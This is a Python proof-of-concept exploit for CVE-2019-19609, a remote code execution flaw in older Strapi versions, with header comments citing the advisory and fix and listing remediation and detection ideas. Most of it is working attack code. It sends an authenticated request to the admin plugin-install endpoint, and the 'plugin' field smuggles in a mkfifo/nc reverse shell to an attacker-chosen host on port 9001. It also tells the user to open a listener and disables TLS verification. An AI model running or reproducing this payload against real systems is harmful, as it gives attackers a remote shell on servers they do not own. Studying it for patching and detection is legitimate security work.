#!/bin/python
# Product: Strapi Framework
# Version Affected: strapi-3.0.0-beta.17.7 and earlier
# Fix PR: https://github.com/strapi/strapi/pull/4636
# NPM Advisory: https://www.npmjs.com/advisories/1424
# more information https://bittherapy.net/post/strapi-framework-remote-code-execution/
#
# Proof of concept for CVE-2019-19609. The script sends one authenticated
# POST to the admin plugin-install endpoint with shell metacharacters
# embedded in the JSON "plugin" field. That the server hands this value to
# a shell is the root cause described in the advisory linked above; it is
# not visible in this script.
#
# Preconditions visible here: a valid admin JWT (sent as a Bearer token),
# so this is post-authentication code execution and admin credential
# hygiene is part of the exposure.
#
# Remediation: upgrade past the affected versions listed above (see Fix PR).
#
# Detection ideas derived from the request this script builds:
#   - POSTs to admin/plugins/install whose "plugin" value is anything other
#     than a plain package name (spaces, '&', ';', '|', '$(' ...).
#   - The Strapi/Node process spawning /bin/sh or nc, creating a FIFO
#     under /tmp, or opening unexpected outbound connections.

import requests
import sys

print("\n\n\nStrapi Framework Vulnerable to Remote Code Execution - CVE-2019-19609")
print("please set up a listener on port 9001 before running the script. you will get a shell to that listener\n")

if len(sys.argv) != 5:
    # NOTE(review): the usage string has no argument placeholders (they may
    # have been lost when the page was extracted). The code below reads four
    # positional arguments in the order: rhost, lhost, jwt, url.
    print('python3 exploit.py ')
else:
    target_host = sys.argv[1]
    callback_host = sys.argv[2]
    admin_token = sys.argv[3]
    endpoint = sys.argv[4] + 'admin/plugins/install'

    request_headers = {
        'Host': target_host,
        # The admin JWT is the only credential the endpoint is given.
        'Authorization': 'Bearer ' + admin_token,
        'Content-Type': 'application/json',
        'Content-Length': '131',
        'Connection': 'close',
    }

    # The injected text rides inside the "plugin" value; a server-side
    # allow-list for package names would reject it before any shell is
    # involved.
    body_prefix = '{ "plugin":"documentation && $(rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc '
    body_suffix = ' 9001 >/tmp/f)", "port":"80" }'
    payload = body_prefix + callback_host + body_suffix

    # verify=False turns off TLS certificate validation, so the bearer token
    # above is sent to whatever peer answers, unauthenticated.
    resp = requests.post(endpoint, headers=request_headers, data=payload, verify=False)